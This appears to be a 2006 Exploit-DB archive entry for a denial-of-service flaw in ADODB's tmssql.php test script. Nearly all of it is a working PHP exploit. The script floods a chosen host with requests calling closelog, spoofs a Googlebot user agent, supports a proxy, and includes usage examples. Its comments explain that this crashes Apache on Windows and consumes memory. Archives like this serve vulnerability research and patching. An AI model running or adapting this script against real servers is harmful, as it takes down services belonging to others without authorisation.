ADODB < 4.70 - tmssql.php Denial of Service Vulnerability

2006-04-09T00:00:00
ID EDB-ID:1651
Type exploitdb
Reporter rgod
Modified 2006-04-09T00:00:00

Description

ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability. Dos exploit for php platform

                                        
                                            #!/usr/bin/php -q -d short_open_tag=on
&lt;?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

if ($argc&lt;4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to ADODB\r\n";
echo "redo:      how many times?\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
  tested against Apache/1.3.27 (Win32) PHP/4.3.3
  
  closelog() func close the connection to the system logger, but if its handle
  is never initialized, Windows exception is raised by the php4ts.dll
  module at address 0x00000000100bf014.
  By sending multiple requests to the tmssql.php script, which allow
  execution of an arbitrary function without arguments, this will cause
  the Apache process to crash and to consume a large amount of memory
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port."\r\n";
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';
	}
  }
  fputs($ock,$packet);
  fclose($ock);
}

$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i&lt;=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]&lt;&gt;'/') or ($path[strlen($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

for ($i=1; $i&lt;=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?&gt;

# milw0rm.com [2006-04-09]